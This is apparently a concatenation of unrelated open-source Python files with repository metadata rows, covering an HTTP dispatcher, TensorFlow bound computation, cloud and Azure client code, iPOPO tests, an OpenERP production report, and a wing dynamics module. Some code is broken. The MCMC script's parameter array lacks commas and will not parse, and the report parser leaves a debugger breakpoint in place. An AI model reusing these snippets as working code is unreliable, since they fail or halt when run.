#######
#Dispatches incoming connections to a new handler.
class ConnectionDispatcher(asyncore.dispatcher):
id = 0
current_id = 1
def __init__(self, settings):
asyncore.dispatcher.__init__(self)
self.settings = settings
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((settings['server_host'], settings['server_port']))
self.listen(settings['server_limit'])
def handle_accept(self):
pair = self.accept()
if pair is None:
pass
else:
sock, addr = pair
handler = Server.ConnectionHandler(sock)
handler.settings = self.settings
handler.id = self.current_id
self.current_id += 1
class ConnectionHandler(asyncore.dispatcher):
rbuff = ""
wbuff = ""
def handle_read(self):
self.rbuff += self.recv(self.settings['server_buffersize'])
try:
request = http.HTTPRequest()
request.decode(self.rbuff)
self.rbuff = ""
for i in handlers.iteritems():
m = i[0].match(request._data['path_path'])
if m:
i[1].handle_request(self, request, m.groupdict())
return
#Error state: no handlers recognise the URL!
err = http.HTTPResponse(responsecode=501)
print err.encode()
self.do_write(err.encode())
except http.BufferUnderflowException:
print "Waiting for more data..."
def do_write(self, data):
self.wbuff += data
def handle_write(self):
if self.wbuff:
sent = self.send(self.wbuff)
print "Wrote %d bytes" % sent
self.wbuff = self.wbuff[sent:]
if len(self.wbuff) == 0:
self.close()
def writable(self):
return len(self.wbuff) > 0
def handle_error(self):
err = http.HTTPResponse(responsecode=500, response=traceback.format_exc())
self.do_write(err.encode())
| bsd-3-clause | -3,733,676,247,853,530,600 | 23.018868 | 77 | 0.677141 | false |
google-research/google-research | caql/dual_method.py | 1 | 5310 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Dual functions."""
import tensorflow.compat.v1 as tf
def get_I(l, u):
# l,u are None, n_layer tensors
# Ip: active relu units
# I: unstable relu units
Ip = tf.where(
tf.logical_and(tf.greater_equal(l, 0.), tf.greater(u, 0.)),
tf.ones_like(u), tf.zeros_like(u))
I = tf.where(
tf.logical_and(tf.greater(u, 0.), tf.less(l, 0.)), tf.ones_like(u),
tf.zeros_like(u))
return Ip, I
def get_D(l, u, Ip, I):
# D matrix for each layer
D = Ip + tf.where(tf.greater(I, 0.5), tf.divide(u, u - l), tf.zeros_like(I))
return D
def create_dual_approx(num_layers, batch_size, action_max, W_T_list, b_T_list,
action_tensor_center, return_full_info=False):
#layers_n: number of hidden units each layer
#W_T_list, b_T_list: multiplicatie and bias weights for each layer
#action_tensor_center: raw input, y: one-hot encoding of labels
# List of bounds (l_i,u_i) for i = 2,...,K-1
l_list = [tf.zeros_like(action_tensor_center)]
u_list = [tf.zeros_like(action_tensor_center)]
# List of transition matrices D_i for i = 2,...,K-1
D_list = [tf.zeros_like(action_tensor_center)]
# Indicators of spanning ReLu neurons for i = 2,...,K-1
I_list = [tf.zeros_like(action_tensor_center)]
# Indicators of active ReLu neurons for i = 2,...,K-1
Ip_list = [tf.zeros_like(action_tensor_center)]
# Final list of duals nu_i for i = 2,...,K-1
Nu_list = [tf.zeros([batch_size, W_T_list[0].get_shape().as_list()[1], 1])]
# Initialize Nu_K
Nu_K = -tf.expand_dims(-tf.eye(1), axis=-1)
# Final list of b_i'*nu_{i+1} for i = 1,...,K-1
gamma_list = [b_T_list[0]]
# Pre-compute bounds for layer 2
# Initialize Nu_hat_1
Nu_hat_1 = tf.tile(tf.expand_dims(W_T_list[0], axis=0), [batch_size, 1, 1])
# Initialize bounds
l_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] - action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
u_2 = tf.matmul(action_tensor_center,
W_T_list[0]) + gamma_list[0] + action_max * tf.norm(
Nu_hat_1, 1, axis=1, keepdims=False)
# Add to list (store in vector format)
l_list.append(l_2)
u_list.append(u_2)
# Recursion
for i in range(2, num_layers):
# form Ip, I
Ip_i, I_i = get_I(l_list[i - 1], u_list[i - 1])
I_list.append(I_i)
Ip_list.append(Ip_i)
# form D
D_i = get_D(l_list[i - 1], u_list[i - 1], Ip_i, I_i)
D_list.append(D_i)
# initialize nu_i
Nu_list.append(tf.einsum('ij,jk->ijk', D_i, W_T_list[i - 1]))
# initialize gamma_i
gamma_list.append(b_T_list[i - 1])
# if final iteration, update with Nu_K
if i == num_layers - 1:
Nu_K = tf.tile(Nu_K, [Nu_list[i - 1].get_shape().as_list()[0], 1, 1])
Nu_list[i - 1] = tf.einsum('ijk,ikm->ijm', Nu_list[i - 1], Nu_K)
gamma_list[i - 1] = tf.einsum('ij,ijm->im', gamma_list[i - 1], Nu_K)
# initialize next layer bounds
l_ip1 = tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(-Nu_list[i - 1]))
u_ip1 = -tf.einsum('ij,ijm->im', l_list[i - 1] * I_list[i - 1],
tf.nn.relu(Nu_list[i - 1]))
# update nu for layers i-1,...,2
for j in range(i - 1, 1, -1):
Nu_hat_j = tf.einsum('jk,ikm->ijm', W_T_list[j - 1], Nu_list[j])
Nu_list[j - 1] = tf.einsum('ij,ijk->ijk', D_list[j - 1], Nu_hat_j)
l_ip1 = tf.add(
l_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(-Nu_list[j - 1])))
u_ip1 = tf.subtract(
u_ip1,
tf.einsum('ij,ijm->im', l_list[j - 1] * I_list[j - 1],
tf.nn.relu(Nu_list[j - 1])))
# update nu_hat_1
Nu_hat_1 = tf.einsum('jk,ikm->ijm', W_T_list[0], Nu_list[1])
# start sum
psi = tf.einsum('ij,ijm->im', action_tensor_center,
Nu_hat_1) + gamma_list[i - 1]
# update gamma for layers 1,...,i-1
for j in range(1, i):
gamma_list[j - 1] = tf.einsum('ij,ijm->im', b_T_list[j - 1], Nu_list[j])
psi = tf.add(psi, gamma_list[j - 1])
Nu_hat_1_norm = tf.norm(Nu_hat_1, 1, axis=1, keepdims=False)
if i < num_layers - 1:
# finalize bounds
l_ip1 = tf.add(l_ip1, psi - action_max * Nu_hat_1_norm)
u_ip1 = tf.add(u_ip1, psi + action_max * Nu_hat_1_norm)
# add to list
l_list.append(l_ip1)
u_list.append(u_ip1)
else:
# compute J_tilde
J_tilde = -psi - action_max * Nu_hat_1_norm - u_ip1
if return_full_info:
return (-J_tilde, l_list, u_list, D_list, Nu_list, gamma_list, psi, l_ip1,
u_ip1, Nu_hat_1)
else:
return -J_tilde
| apache-2.0 | 5,858,996,064,217,988,000 | 31.181818 | 78 | 0.575706 | false |
googleapis/python-game-servers | samples/snippets/update_cluster.py | 1 | 2348 | #!/usr/bin/env python
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google Cloud Game Servers sample for updating a game server cluster.
Example usage:
python update_cluster.py --project-id <project-id> --location <location> --realm-id <realm-id> --cluster-id <cluster-id>
"""
import argparse
from google.cloud import gaming
from google.cloud.gaming_v1.types import game_server_clusters
from google.protobuf import field_mask_pb2 as field_mask
# [START cloud_game_servers_cluster_update]
def update_cluster(project_id, location, realm_id, cluster_id):
"""Updates a game server cluster."""
client = gaming.GameServerClustersServiceClient()
request = game_server_clusters.UpdateGameServerClusterRequest(
game_server_cluster=game_server_clusters.GameServerCluster(
name=f"projects/{project_id}/locations/{location}/realms/{realm_id}/gameServerClusters/{cluster_id}",
labels={"label-key-1": "label-value-1", "label-key-2": "label-value-2"},
),
update_mask=field_mask.FieldMask(paths=["labels"]),
)
operation = client.update_game_server_cluster(request)
print(f"Update cluster operation: {operation.operation.name}")
operation.result(timeout=120)
# [END cloud_game_servers_cluster_update]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--project-id', help='Your cloud project ID.', required=True)
parser.add_argument('--location', help='Your realm location.', required=True)
parser.add_argument('--realm-id', help='Your realm ID.', required=True)
parser.add_argument('--cluster-id', help='Your game server cluster ID.', required=True)
args = parser.parse_args()
update_cluster(args.project_id, args.location, args.realm_id, args.cluster_id)
| apache-2.0 | -2,334,753,272,189,716,500 | 38.79661 | 124 | 0.721039 | false |
mclaughlin6464/pearce | bin/optimization/cosmo_hyperparams_mcmc.py | 1 | 2197 | import emcee as mc
from pearce.emulator import OriginalRecipe, ExtraCrispy
from pearce.mocks import cat_dict
import numpy as np
from os import path
training_file = '/home/users/swmclau2/scratch/PearceRedMagicXiCosmo.hdf5'
a = 1.0
z = 1./a-1.0
fixed_params = {'z':z, 'r':24.06822623}
n_leaves, n_overlap = 10, 2
em_method = 'gp'
emu = OriginalRecipe(training_file, method = em_method, fixed_params=fixed_params, downsample_factor = 0.1)
# TODO downsample sampling?
def nll(p):
emu._emulator.set_parameter_vector(p)
ll = emu._emulator.lnlikelihood(emu.downsample_y, quiet=True)
return -ll if np.isfinite(ll) else 1e25
def lnprior(theta):
return -np.inf if np.any(np.logical_or(theta < -15, theta > 15)) else 0
def lnprob(theta, *args):
lp = lnprior(theta)
if not np.isfinite(lp):
return -np.inf
return lp - nll(theta, *args)
#p0 = emu._emulator.get_parameter_vector()
#p0 = np.array([ 0. , 10.6161248, 1.8339794, 7.342365 , 10.6371797,
# 2.2441632, 13.8155106, 11.3512804, 3.1795786, 4.6846614,
# 1. , 5.0188608, 3.7658774, -1.5383083])
p0 = np.array([-12.0550382, 0.1054246, 0.2661017, 5.6407612, 0.2408568, 1.1295944,
0.3643993, 11.5649985, 4.9071932, 4.7031938, 1., 11.7621938,
10.6279446, 0., 10.6161248, 1.8339794, 7.342365 10.6371797,
2.2441632, 13.8155106, 11.3512804 3.1795786, 4.6846614 1.,
5.0188608, 3.7658774, -1.5383083])
nwalkers = 100
nsteps = 2000
nburn = 0
num_params = p0.shape[0]#len(emu.get_param_names())+1
pos0 = p0+np.random.randn(nwalkers, num_params)
ncores = 16
savedir = '/home/users/swmclau2/scratch/'
chain_fname = path.join(savedir, '%d_walkers_%d_steps_cosmo_hyperparams.npy'%(nwalkers, nsteps))
pnames = ['amp']
pnames.extend(emu.get_param_names())
with open(chain_fname, 'w') as f:
f.write('#' + '\t'.join(pnames)+'\t'+ '\t'.join(pnames)+'\tamp'+'\n')
sampler = mc.EnsembleSampler(nwalkers, num_params, lnprob, threads=ncores)
for result in sampler.sample(pos0, iterations = nsteps, storechain=False):
with open(chain_fname, 'a') as f:
np.savetxt(f, result[0])
| mit | 4,898,353,105,985,238,000 | 32.287879 | 107 | 0.646791 | false |
Azure/azure-sdk-for-python | sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/job/models/job_state_audit_record.py | 1 | 1805 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class JobStateAuditRecord(Model):
"""The Data Lake Analytics job state audit records for tracking the lifecycle
of a job.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar new_state: The new state the job is in.
:vartype new_state: str
:ivar time_stamp: The time stamp that the state change took place.
:vartype time_stamp: datetime
:ivar requested_by_user: The user who requests the change.
:vartype requested_by_user: str
:ivar details: The details of the audit log.
:vartype details: str
"""
_validation = {
'new_state': {'readonly': True},
'time_stamp': {'readonly': True},
'requested_by_user': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'new_state': {'key': 'newState', 'type': 'str'},
'time_stamp': {'key': 'timeStamp', 'type': 'iso-8601'},
'requested_by_user': {'key': 'requestedByUser', 'type': 'str'},
'details': {'key': 'details', 'type': 'str'},
}
def __init__(self, **kwargs):
super(JobStateAuditRecord, self).__init__(**kwargs)
self.new_state = None
self.time_stamp = None
self.requested_by_user = None
self.details = None
| mit | -5,939,820,053,492,980,000 | 34.392157 | 81 | 0.584488 | false |
tcalmant/ipopo | tests/shell/test_eventadmin.py | 1 | 5604 | #!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Tests the EventAdmin shell commands
:author: Thomas Calmant
"""
# Standard library
import threading
try:
import unittest2 as unittest
except ImportError:
import unittest
# Pelix
from pelix.ipopo.constants import use_ipopo
import pelix.framework
import pelix.services
import pelix.shell
# ------------------------------------------------------------------------------
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# ------------------------------------------------------------------------------
class DummyEventHandler(object):
"""
Dummy event handler
"""
def __init__(self):
"""
Sets up members
"""
# Topic of the last received event
self.last_event = None
self.last_props = {}
self.__event = threading.Event()
def handle_event(self, topic, properties):
"""
Handles an event received from EventAdmin
"""
# Keep received values
self.last_event = topic
self.last_props = properties
self.__event.set()
def pop_event(self):
"""
Pops the list of events
"""
# Clear the event for next try
self.__event.clear()
# Reset last event
event, self.last_event = self.last_event, None
return event
def wait(self, timeout):
"""
Waits for the event to be received
"""
self.__event.wait(timeout)
# ------------------------------------------------------------------------------
class EventAdminShellTest(unittest.TestCase):
"""
Tests the EventAdmin shell commands
"""
def setUp(self):
"""
Prepares a framework and a registers a service to export
"""
# Create the framework
self.framework = pelix.framework.create_framework(
('pelix.ipopo.core',
'pelix.shell.core',
'pelix.services.eventadmin',
'pelix.shell.eventadmin'))
self.framework.start()
# Get the Shell service
context = self.framework.get_bundle_context()
svc_ref = context.get_service_reference(pelix.shell.SERVICE_SHELL)
self.shell = context.get_service(svc_ref)
# Instantiate the EventAdmin component
context = self.framework.get_bundle_context()
with use_ipopo(context) as ipopo:
self.eventadmin = ipopo.instantiate(
pelix.services.FACTORY_EVENT_ADMIN,
"evtadmin", {})
def _register_handler(self, topics, evt_filter=None):
"""
Registers an event handler
:param topics: Event topics
:param evt_filter: Event filter
"""
svc = DummyEventHandler()
context = self.framework.get_bundle_context()
svc_reg = context.register_service(
pelix.services.SERVICE_EVENT_HANDLER, svc,
{pelix.services.PROP_EVENT_TOPICS: topics,
pelix.services.PROP_EVENT_FILTER: evt_filter})
return svc, svc_reg
def _run_command(self, command, *args):
"""
Runs the given shell command
"""
# Format command
if args:
command = command.format(*args)
# Run command
self.shell.execute(command)
def tearDown(self):
"""
Cleans up for next test
"""
# Stop the framework
pelix.framework.FrameworkFactory.delete_framework(self.framework)
self.framework = None
def testTopics(self):
"""
Tests sending topics
"""
# Prepare a handler
handler, _ = self._register_handler('/titi/*')
# Send events, with a matching topic
for topic in ('/titi/toto', '/titi/', '/titi/42', '/titi/toto/tata'):
self._run_command("send {0}", topic)
self.assertEqual(handler.pop_event(), topic)
# Send events, with a non-matching topic
for topic in ('/toto/titi/42', '/titi', '/toto/42'):
self._run_command("send {0}", topic)
self.assertEqual(handler.pop_event(), None)
def testFilters(self):
"""
Tests the sending events with properties
"""
# Prepare a handler
key = "some.key"
handler, _ = self._register_handler(None, '({0}=42)'.format(key))
# Assert the handler is empty
self.assertEqual(handler.pop_event(), None)
# Send event, with matching properties
for topic in ('/titi/toto', '/toto/', '/titi/42', '/titi/toto/tata'):
value = 42
evt_props = {key: value}
self._run_command("send {0} {1}=42", topic, key, value)
# Check properties
self.assertIn(key, handler.last_props)
self.assertEqual(str(handler.last_props[key]), str(value))
self.assertIsNot(handler.last_props, evt_props)
# Check topic
self.assertEqual(handler.pop_event(), topic)
# Send events, with a non-matching properties
self._run_command("send {0} {1}=21", topic, key)
self.assertEqual(handler.pop_event(), None)
def testPost(self):
"""
Tests the post event method
"""
# Prepare a handler
handler, _ = self._register_handler('/titi/*')
# Post a message
topic = '/titi/toto'
self._run_command("post {0}", topic)
# Wait a little
handler.wait(1)
self.assertEqual(handler.pop_event(), topic)
| apache-2.0 | 4,493,402,563,130,737,000 | 27.738462 | 80 | 0.544254 | false |
Micronaet/micronaet-bom | order_bom_explode_report/report/originali/mrp_status_hw_component_parser.py | 1 | 21833 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2010-2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
# Copyright(c)2008-2010 SIA "KN dati".(http://kndati.lv) All Rights Reserved.
# General contacts <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import xlsxwriter # XLSX export
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.report import report_sxw
from openerp.report.report_sxw import rml_parse
from datetime import datetime, timedelta
from openerp.tools.translate import _
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class Parser(report_sxw.rml_parse):
default_days = 30
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context)
self.localcontext.update({
'get_object': self.get_object,
'get_filter': self.get_filter,
'get_date': self.get_date,
'get_parent_oc_period': self.get_parent_oc_period,
})
def get_parent_oc_period(self, parent):
res = ''
period = self.order_month.get(parent, {})
for date in sorted(period):
res += '[%s %s] ' % (date, period[date])
return res
def get_date(self, ):
''' Get filter selected
'''
return datetime.now().strftime(DEFAULT_SERVER_DATE_FORMAT)
def get_filter(self, data):
''' Get filter selected
'''
if data is None:
data = {}
days = data.get('days', self.default_days)
return _('Active production for %s days') % days
def get_object(self, data):
''' Search all mrp elements
'''
# Readability:
cr = self.cr
uid = self.uid
context = {}
user_pool = self.pool.get('res.users')
previous_status = user_pool.set_no_inventory_status(
cr, uid, value=False, context=context)
# ---------------------------------------------------------------------
# Utility:
# ---------------------------------------------------------------------
def log_line(self, line, extra=None, mode='product'):
''' Utility for log in excel file:
'''
if extra is None:
extra = {}
if mode == 'product':
WS = self.WS[mode]
# -------------------------------------------------------------
# Write header:
# -------------------------------------------------------------
if not self.counters[mode]:
counter = self.counters[mode]
header = [
# Reference:
'Parent', 'DB padre', 'Product', 'Order ref.',
# Order quantity:
#'OC') # MA
#'B' # B total
#'Delivery') # BC
# Quantity for accounting:
'Remain to MRP', # OC
'Ready', # B net
'Stock', # Stock
# Calculated data
'TODO',
# Check
'No BOM', 'Negative',
]
header.extend(extra.keys())
col = 0
for h in header:
WS.write(counter, col, h)
col += 1
self.counters[mode] += 1
# -------------------------------------------------------------
# Write data line:
# -------------------------------------------------------------
col = 0
counter = self.counters[mode]
# Write constant data:
for item in line:
WS.write(counter, col, item)
col += 1
# Write extra data:
for k in extra:
WS.write(counter, col, extra[k])
col += 1
self.counters[mode] += 1
elif mode == 'halfwork':
pass
elif mode == 'component':
pass
elif mode == 'mrp':
WS = self.WS[mode]
# -------------------------------------------------------------
# Write header:
# -------------------------------------------------------------
if not self.counters[mode]:
counter = self.counters[mode]
header = [
# Reference:
'MRP', 'OC', 'Code', 'Maked',
]
col = 0
for h in header:
WS.write(counter, col, h)
col += 1
self.counters[mode] += 1
# -------------------------------------------------------------
# Write data line:
# -------------------------------------------------------------
col = 0
counter = self.counters[mode]
# Write constant data:
for item in line:
WS.write(counter, col, item)
col += 1
self.counters[mode] += 1
else:
pass # error
return
# ---------------------------------------------------------------------
# Procedure:
# ---------------------------------------------------------------------
self.order_month = {} # Parent distribution for month
if data is None:
data = {}
# Log part
# TODO change:
filename = '/home/administrator/photo/log/parent_product.xlsx'
WB = xlsxwriter.Workbook(filename)
extra = {
'code_check': '',
'stock_check': '',
}
self.counters = {
'product': 0,
'halfwork': 0,
'component': 0,
'mrp': 0,
}
self.WS = {
'product': WB.add_worksheet(),
'halfwork': WB.add_worksheet(),
'component': WB.add_worksheet(),
'mrp': WB.add_worksheet(),
}
days = data.get('days', self.default_days)
first_supplier_id = data.get('first_supplier_id')
# Create deadline period in report:
with_deadline = data.get('with_deadline', False)
# TODO change used for now!!!!!!
#reference_date = '2016-10-15 00:00:00'
# 04/01/2017 Change after inventory
reference_date = '2017-09-01 00:00:00' # TODO keep in parameter
# TODO manage day range
if days:
limit_date = '%s 23:59:59' % (
datetime.now() + timedelta(days=days)).strftime(
DEFAULT_SERVER_DATE_FORMAT)
else:
limit_date = False
# Pool used:
company_pool = self.pool.get('res.company')
sale_pool = self.pool.get('sale.order')
#sol_pool = self.pool.get('sale.order.line')
mrp_pool = self.pool.get('mrp.production')
_logger.warning('Range period: MRP from %s, Max open MRP <= %s' % (
reference_date, limit_date or 'no limit'))
# ---------------------------------------------------------------------
# To produce line in order open
# ---------------------------------------------------------------------
# Database
parent_todo = {}
stock_used = [] # for product and halfwork
hws = {}
order_ids = company_pool.mrp_domain_sale_order_line(
cr, uid, context=context)
for order in sale_pool.browse(cr, uid, order_ids, context=context):
for line in order.order_line: # order line
# Reset log:
extra['code_check'] = ''
extra['stock_check'] = ''
if line.mx_closed:
continue
product = line.product_id # readability
default_code = product.default_code
if not default_code:
extra['code_check'] = 'no product code'
log_line(self, [
'', '', '', order.name, '', '', '', '', '', '',
], extra)
continue # TODO raise error or log
parent = default_code[:3]
if parent not in parent_todo:
# Stock, Order to produce, has stock negative
parent_todo[parent] = [
False, # 0. Parent bom for explode
0.0, # 1. Stock status net
0.0, # 2. Order to produce # merge with 1?
0, # 3. Stock status negative (total)
0, # 4. No parent bom (total)
0.0, # 5. Produce to delivery
]
# -------------------------------------------------------------
# Populate parent database:
# -------------------------------------------------------------
# Setup parent bom fist time only (and check when not present):
parent_bom = product.parent_bom_id
if parent_bom and not parent_todo[parent][0]:
# only once
parent_todo[parent][0] = parent_bom
else:
if not parent_bom:
# Check no parent
parent_todo[parent][4] += 1
# ---------------------------------------
# Stock check (use stock qty only once!):
# ---------------------------------------
if default_code not in stock_used:
extra['stock_check'] += 'used'
stock_used.append(default_code)
stock_net = product.mx_net_qty
# Check negative stock for highlight:
if stock_net < 0:
import pdb; pdb.set_trace()
parent_todo[parent][3] += 1
parent_todo[parent][1] += stock_net # Net in stock (once)
else:
extra['stock_check'] += 'not used'
stock_net = 0.0 # no used
# ---------------
# Check negative:
# ---------------
# Use utility function:
(oc_remain, not_delivered) = \
company_pool.mrp_order_line_to_produce(line)
parent_todo[parent][2] += oc_remain
parent_todo[parent][5] += not_delivered
# -------------------------------------------------------------
# Populate halfwork database:
# -------------------------------------------------------------
todo = oc_remain # XXX - stock_net + not_delivered
# Log line operation:
log_line(self, [
parent, parent_bom.code or '???', default_code,
order.name, oc_remain, not_delivered, stock_net, todo,
'' if parent_bom else 'X', '' if stock_net >= 0 else 'X',
], extra)
# -------------------------------------------------------------
# Deadline calendar (depend on wizard, section in report):
# -------------------------------------------------------------
if with_deadline and todo:
if parent not in self.order_month:
self.order_month[parent] = {}
if line.date_deadline:
deadline_period = line.date_deadline[2:7]
else:
deadline_period = '??'
if deadline_period in self.order_month[parent]:
self.order_month[parent][deadline_period] += todo
else:
self.order_month[parent][deadline_period] = todo
# -------------------------------------------------------------
# Halfwork from parent BOM
# -------------------------------------------------------------
for hw in parent_bom.bom_line_ids:
halfwork = hw.product_id
if halfwork.relative_type != 'half':
continue
if halfwork not in hws: # halfwork browse obj
hws[halfwork] = [
0.0, # 0. Needed
halfwork.mx_net_qty, # 1. Net (after - MRP) # TODO remove MRP ?
{}, # 2. XXX total component for check double order?
# XXX No OF
]
# Update total TODO * q. in BOM:
hws[halfwork][0] += todo * hw.product_qty
# Save total for this bom (parent and halfwork) = key
# XXX used for not order double pipes?
hws[halfwork][2][
(parent, halfwork)] = hw.product_qty
# ---------------------------------------------------------------------
# Clean HW for unload production:
# ---------------------------------------------------------------------
mrp_ids = mrp_pool.search(cr, uid, [
# State filter:
#('state', '!=', 'cancel'), # not correct !!!
# Period filter (only up not down limit)
('date_planned', '>=', reference_date),
], context=context)
# Generate MRP total component report with totals:
for mrp in mrp_pool.browse(cr, uid, mrp_ids, context=context):
for sol in mrp.order_line_ids:
product = sol.product_id
qty_maked = sol.product_uom_maked_sync_qty
# TODO better use dynamic_bom_line_ids ?
# check existence
# Log product extract as MRP
log_line(self, (
mrp.name, sol.order_id.name, product.default_code,
qty_maked), mode='mrp')
for hw in product.parent_bom_id.bom_line_ids:
halfwork = hw.product_id
if halfwork.relative_type != 'half':
continue # Not used in this report
if halfwork not in hws:
continue # TODO Raise error not in bom?
hw_q = qty_maked * hw.product_qty
hws[halfwork][1] -= hw_q # - MRP # TODO check same problem
# TODO check if is bouble - MRP!!!
# ---------------------------------------------------------------------
# Prepare report:
# ---------------------------------------------------------------------
res = []
# Empty record
empty_A = ['' for n in range(0, 7)] # parent 7
empty_B = ['' for n in range(0, 6)] # halfwork 6
empty_C = ['' for n in range(0, 7)] # component 7
hw_present = [] # for highlight only first total in report (for orders)
for parent in sorted(parent_todo):
record = parent_todo[parent]
# -----------------------------------------------------------------
# BLOCK A:
# -----------------------------------------------------------------
# Parent data:
data_A = [
parent, # 0. Code
record[2], # 1. OC
record[1], # 2. Mag (Net stock - MRP calculated)
record[5], # 3. Produced to delivery
record[2], # XXX ex.: - record[1] + record[5], # 4. todo
record[3], # 5. tot. negative stock (for green-red light)
record[4], # 6. tot. no bom (for green-red light)
# TODO
]
if not record[0]: # parent bom present:
res.append(data_A + empty_B + empty_C)
continue
parent_first = True
for hw in record[0].bom_line_ids:
if not hw.product_id or hw.product_id.id in hw_present:
yet_write = True # yet write in report before
else:
hw_present.append(hw.product_id.id)
yet_write = False # yet write in report before
if not hw.product_id in hws: # hw in the list selection
continue # not in selected list create before
if parent_first:
parent_first = False
else:
data_A = empty_A # reset A
# -------------------------------------------------------------
# BLOCK B:
# -------------------------------------------------------------
halfwork = hw.product_id # readability
hw_data = hws.get(halfwork, False)
if not hw_data:
res.append(data_A + empty_B + empty_C)
continue
proposed_hw = hw_data[0] - hw_data[1]
data_B = [
hw_data[2].get(
(parent, halfwork), '?'), # total
halfwork.default_code, # hw code
hw_data[0], # Todo halfwork
hw_data[1], # Stock
proposed_hw,
yet_write, # yet write status
]
hw_first = True
for cmpt in halfwork.half_bom_ids:
if hw_first:
hw_first = False
data_AB = data_A + data_B
else:
data_AB = data_A + empty_B
# ---------------------------------------------------------
# BLOCK C:
# ---------------------------------------------------------
cmpt_net = cmpt.product_id.mx_net_qty
cmpt_of = cmpt.product_id.mx_of_in
proposed = \
proposed_hw * cmpt.product_qty - cmpt_net - cmpt_of
# Add data block directly:
res.append(data_AB + [
cmpt.product_qty, # total
cmpt.product_id.default_code, # code
proposed_hw * cmpt.product_qty,
cmpt_net,
cmpt_of,
proposed if proposed > 0.0 else '',
proposed if proposed <= 0.0 else '',
])
if hw_first: # no cmpt data (not in loop)
res.append(data_A + data_B + empty_C)
user_pool.set_no_inventory_status(
cr, uid, value=previous_status, context=context)
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,514,814,840,149,318,000 | 41.809804 | 95 | 0.373609 | false |
google/makani | analysis/control/dynamics.py | 1 | 28331 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python dynamics helpers.
Provides a simplified control-oriented model of the wing and tether.
"""
import collections
import copy
from makani.analysis.control import actuator_util
from makani.analysis.control import catenary
from makani.analysis.control import geometry
from makani.analysis.control import type_util
from makani.control import control_types
from makani.control import system_types
from makani.sim.physics import physics
import numpy as np
# Structure storing a force, moment, and position at which that force
# is applied.
ForceMomentPos = collections.namedtuple('ForceMomentPos',
['force', 'moment', 'pos'])
# Structure for storing forces and moment.
ForceMoment = collections.namedtuple('ForceMoment', ['force', 'moment'])
# Structure representing the inputs to the wing.
# thrust: Motor thrust [N] (1-by-1 np.matrix).
# motor_moment: Motor moments [N-m] (3-by-1 np.matrix).
# flaps: Flaps [rad] (kNumFlaps-by-1 np.matrix).
# wind_g: Wind speed [m/s] in ground coordinates (3-by-1 np.matrix).
WingInputs = type_util.MakeNamedVectorClass( # pylint: disable=invalid-name
'WingInputs', [('thrust', range(0, 1)),
('motor_moment', range(1, 4)),
('flaps', range(4, 4 + system_types.kNumFlaps)),
('wind_g', range(4 + system_types.kNumFlaps,
7 + system_types.kNumFlaps))])
class WingState(type_util.MakeStateClass(
'WingState', [('omega_b', range(0, 3)),
('dcm_g2b', range(3, 6)),
('wing_vel_g', range(6, 9)),
('wing_pos_g', range(9, 12))])):
"""Class representing the state of the wing.
Attributes:
omega_b: Body angular rates.
dcm_g2b: Ground to body rotation DCM. Increments in the DCM are represented
by an Euler vector.
